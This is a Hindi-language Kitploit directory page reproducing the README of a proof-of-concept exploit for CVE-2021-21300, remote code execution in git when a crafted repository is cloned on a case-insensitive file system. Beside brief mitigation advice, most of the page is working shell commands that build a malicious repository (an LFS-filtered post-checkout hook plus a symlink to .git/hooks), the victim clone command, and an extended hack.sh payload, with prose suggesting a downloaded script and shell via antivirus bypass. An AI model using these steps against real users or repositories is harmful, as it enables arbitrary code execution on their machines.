Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-21300 — CVE-2021-21300 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, केस-असंवेदनशील फाइल सिस्टम पर सिमलिंक और फ़िल्टर दुरुपयोग के साथ दुर्भावनापूर्ण git रिपॉजिटरी क्लोनिंग के माध्यम से रिमोट कोड निष्पादन प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/fengzhouc/cve-2021-21300
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपार्श्व आंदोलनशेलकोडपोस्ट-शोषणकमांड एंड कंट्रोलरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubfengzhouc/cve-2021-21300

CVE-2021-21300

CVE-2021-21300 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, केस-असंवेदनशील फाइल सिस्टम पर सिमलिंक और फ़िल्टर दुरुपयोग के साथ दुर्भावनापूर्ण git रिपॉजिटरी क्लोनिंग के माध्यम से रिमोट कोड निष्पादन प्रदर्शित करता है।

35 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

CVE-2021-21300

git के कई संस्करणों में, सिम्लिंक (symlink) प्रसंस्करण सख्त नहीं है। केस-सेंसिटिव (जैसे Linux) फ़ाइल सिस्टम पर git में फ़ाइलें अपलोड करने के बाद, केस-इन्सेंसिटिव फ़ाइल सिस्टम (जैसे Windows) वाले होस्ट द्वारा दुर्भावनापूर्ण रिपॉजिटरी को क्लोन करने पर रिमोट कमांड निष्पादन हो सकता है।

प्रभावित संस्करण

2.15 से वर्तमान 2.30.1 तक

समाधान

  1. संस्करण अपडेट करें

  2. इस प्रकार:

git के symlink को अक्षम करें: git config --global core.symlinks false

प्रोसेस फ़िल्टर (आमतौर पर LFS इसका उपयोग करता है) को अक्षम करें, git config --show-scope --get-regexp 'filter\..*\.process के माध्यम से देखा जा सकता है

ट्रिगर शर्तें

  1. रिपॉजिटरी में समान नाम वाला एक लिंक प्रतीक (symlink) और एक निर्देशिका मौजूद हो

  2. सिम्लिंक एक विशेष निर्देशिका (वर्तमान में .git/hooks प्रतीत होता है) की ओर इशारा करता है

  3. पीड़ित मशीन के पास दुर्भावनापूर्ण कमांड निष्पादित करने के लिए पर्याप्त अनुमति होनी चाहिए

पुनरुत्पादन

01 वातावरण तैयारी

① रिपॉजिटरी तैयारी

सिस्टम: ubuntux64

git और git-lfs स्थापित करना आवश्यक है

git lfs install कमांड चलाने पर त्रुटि हो सकती है

root@kitploit:~
Error: Failed to call git rev-parse --git-dir: exit status 128

इसे अनदेखा किया जा सकता है

Git LFS initialized. आने पर स्थापना पूर्ण होती है

② पीड़ित मशीन

सिस्टम: win10x64

git for window : Git-2.17.1-64-bit

(https://www.npackd.org/p/git64/2.17.1.2)

git for window की स्थापना डिफ़ॉल्ट रूप से की जा सकती है

02 दुर्भावनापूर्ण रिपॉजिटरी तैयारी

① GitHub पर नई रिपॉजिटरी बनाएं

ऑनलाइन कई ट्यूटोरियल उपलब्ध हैं, विस्तार में नहीं जा रहे

② Ubuntu पर दुर्भावनापूर्ण रिपॉजिटरी बनाएं और GitHub पर अपलोड करें

निम्नलिखित कमांड निष्पादित करें

root@kitploit:~
$ git init
$ echo "A/post-checkout filter=lfs diff=lfs merge=lfs">.gitattributes &&
mkdir A &&
printf '#!/bin/sh\n\necho PWNED >&2\n'>A/post-checkout &&
chmod +x A/post-checkout &&
>A/a &&
>A/b &&
git add -A &&
rm -rf A &&
ln -s .git/hooks a &&
git add a &&
git commit -m initial
$ git branch -M main
$ git remote add origin [自己的仓库地址]
$ git push -u origin main

03 आक्रमण परीक्षण

Windows 10 पर PowerShell (व्यवस्थापक) में निम्नलिखित कमांड निष्पादित करें:

git clone -c core.symlinks=true [अपनी रिपॉजिटरी का पता]

क्लोन करने के बाद 'PWNED' दिखाई देना रिमोट कमांड निष्पादन की सफलता को दर्शाता है

यह देखा जा सकता है कि क्लोन करते समय, post-checkout फ़ाइल में कमांड निष्पादित किए गए।

विचार IEX का उपयोग करके स्क्रिप्ट डाउनलोड करना, फिर काली के माध्यम से शेल प्राप्त करने के लिए सुनना है, लेकिन अधिकांश स्क्रिप्ट पहचानी और अवरुद्ध हो जाती हैं, एंटी-वायरस बायपास के माध्यम से इसे प्राप्त किया जा सकता है।

04 विस्तारित उपयोग

निर्देशिका में स्क्रिप्ट फ़ाइल hack.sh जोड़ें

सामग्री निम्नलिखित है

root@kitploit:~
#!/bin/sh
#################
echo "script working..." &&
cd / &&
pwd &&
mkdir hack
cd hack &&
touch hacked &&
echo "you has been hacked">hacked &&
echo "done!"

post-checkout में निष्पादित कमांड को बदलें ताकि स्क्रिप्ट निष्पादित हो

printf '#!/bin/sh\n\necho PWNED\n\n./hack.sh >&2\n'>A/post-checkout

टूल डाउनलोड करें